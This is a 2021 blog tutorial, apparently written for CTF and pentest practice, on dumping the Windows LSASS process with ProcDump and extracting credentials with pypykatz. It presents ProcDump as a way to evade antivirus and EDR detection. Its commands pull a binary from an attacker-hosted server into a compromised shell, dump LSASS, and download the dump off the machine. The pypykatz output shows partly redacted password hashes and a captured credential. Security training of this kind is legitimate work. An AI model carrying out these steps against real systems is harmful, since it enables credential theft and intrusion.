18th September 2021
procdump dumping lsass

How to dump LSASS with ProcDump

This article is for educational purposes only! I do not encourage you to run this to a machine you do not have permission to run. Performing these actions without permission can lead to prosecution by the courts. I am not responsible for your actions!

In this short article, I will guide you to the steps you can perform to dump the LSASS process on a machine running Microsoft Windows. Without further redue, let’s get jump into it.

Overview

If you are working on a CTF or you are assigned to perform a pentest on a machine, you can come in the situation that you have to dump the LSASS process. You can use the well-known tool Mimikatz for this purpose. Mimikatz has only one big problem, it’s recognized by 57 / 70 antivirus products on VirusTotal, so using Mimikatz is not a wise choice for most environments. You have a high chance that you’re being noticed by the antivirus and so you will reveal to the blue teamers that you are in the network.

To avoid detection, you can use a LOLBAS (Living On the Land Binary Or Script) approach, by using ProcDump, instead of Mimikatz. ProcDump is recognized by 1 / 68 antivirus products on VirusTotal.

Even when you are using ProcDump you have to watch out. Some companies have deployed an EDR (Endpoint Detection and Response) solution on their systems. Most EDR solutions will generate a Medium alert when ProcDump is being used to dump a process, especially when the LSASS process is involved.

ProcDump

ProcDump is part of the Windows SysInternals, the main purpose of this command-line utility is to troubleshoot CPU spikes and generating crash dumps during a spike, so that an administrator or developer can determine the cause of the spike. But, it can also generate a dump of a process. And, especially the last functionality is useful in our scenario.

Dumping LSASS

In this example, I have broken into a system and I want to dump the LSASS. I have already a shell on the machine through Windows Remote Management (WinRM) with evil-winrm.

On the victim machine, we have downloaded procdump.exe to the C:\temp directory. I have hosted a HTTP server on my attacker machine, to download the binary.

*Evil-WinRM* PS C:\temp> curl 10.10.14.13/procdump.exe -o procdump.exe 

Now, we can dump the lsass.exe proces.

*Evil-WinRM* PS C:\temp> .\procdump.exe -accepteula -ma lsass.exe lsass.dmp
ProcDump v10.0 - Sysinternals process dump utility
Copyright (C) 2009-2020 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[03:22:03] Dump 1 initiated: C:\temp\lsass.dmp
[03:22:03] Dump 1 writing: Estimated dump file size is 53 MB.
[03:22:04] Dump 1 complete: 53 MB written in 0.8 seconds
[03:22:04] Dump count reached.

Ok, we have now the lsass.dmp file which contains juicy information. We need to transfer this file to our attacker machine to analyze the contents.

*Evil-WinRM* PS C:\temp> download lsass.dmp

Info: Downloading C:\temp\lsass.dmp to lsass.dmp

Info: Download successful!

Extracting lsass.dmp

To analyze the contents we are using Pypykatz. Pypykatz is the Python implementation of Mimikatz. If you not have pypykatz installed, you can install it by running this command below.

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/home/kali/hacking]
โ””โ”€# git clone https://github.com/skelsec/pypykatz.git
Cloning into 'pypykatz'โ€ฆ
remote: Enumerating objects: 2482, done.
remote: Counting objects: 100% (852/852), done.
remote: Compressing objects: 100% (348/348), done.
remote: Total 2482 (delta 539), reused 754 (delta 501), pack-reused 1630
Receiving objects: 100% (2482/2482), 903.21 KiB | 4.38 MiB/s, done.
Resolving deltas: 100% (1504/1504), done.

Now run Pypykatz and call the lsass.dmp file.

โ”Œโ”€โ”€(root๐Ÿ’€kali)-[/home/kali/hacking]                                                                                                                                                
โ””โ”€# pypykatz lsa minidump lsass.dmp
INFO:root:Parsing file lsass.dmp                                                                                                                                                              
FILE: ======== lsass.dmp =======                                                                                                                                                              
== LogonSession ==                                                                                                                                                                            
authentication_id 3146260 (300214)                                                                                                                                                            
session_id 0                                                                                                                                                                                  
username Administrator                                                                                                                                                                        
domainname FUTURE                                                                                                                                                                               
logon_server FUTURE                                                                                                                                                                            
logon_time 2021-06-19T10:21:54.261897+00:00                                                                                                                                                   
sid S-1-5-21-1199094703-3580107816-3092147818-500                                                                                                                                             
luid 3146260
                                                                                                                                                                                
== LogonSession ==                                                                                                                                                                            
authentication_id 2849314 (2b7a22)                                                                                                                                                            
session_id 0                                                                                                                                                                                  
username Administrator                                                                                                                                                                        
domainname FUTURE                                                                                                                                                                           
logon_server FUTURE                                                                                                                                                                          
logon_time 2021-06-19T10:12:08.766735+00:00                                                                                                                                                   
sid S-1-5-21-1199094703-3580107816-3092147818-500                                                                                                                                             
luid 2849314
                                                                                                                                                                                 
== LogonSession ==                                                                                                                                                                            
authentication_id 347219 (54c53)                                                                                                                                                              
session_id 1                                                                                                                                                                                  
username rodny                                                                                                                                                                                
domainname FUTURE                                                                                                                                                                               
logon_server FUTURE                                                                                                                                                                            
logon_time 2021-06-19T09:32:07.942538+00:00                                                                                                                                                   
sid S-1-5-21-1199094703-3580107816-3092147818-1002                                                                                                                                            
luid 347219                                                                                                                                                                                   
    == MSV ==                                                                                                                                                                                  
         Username: rodny                                                                                                                                                                       
         Domain: FUTURE                                                                                                                                                                          
         LM: NA       
         NT: 499ae<REDACTED>742ffe
         SHA1: b7c4ec<REDACTED>d18141113cc78
 == WDIGEST [54c53]==
         username rodny
         domainname FUTURE
         password None
    == Kerberos ==
         Username: rodny
         Domain: FUTURE
         Password: None
    == WDIGEST [54c53]==
         username rodny
         domainname FUTURE
         password None
    == CREDMAN [54c53]==
         luid 347219
         username FUTURE\rodny
         domain FUTURE\rodny
         password [email protected]@
...

You have now extracted the lsass.dmp file which can contains plain text passwords. You can try to decrypt the LM hash and NT hash with hashcat.

Happy hacking! ๐Ÿ™‚

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *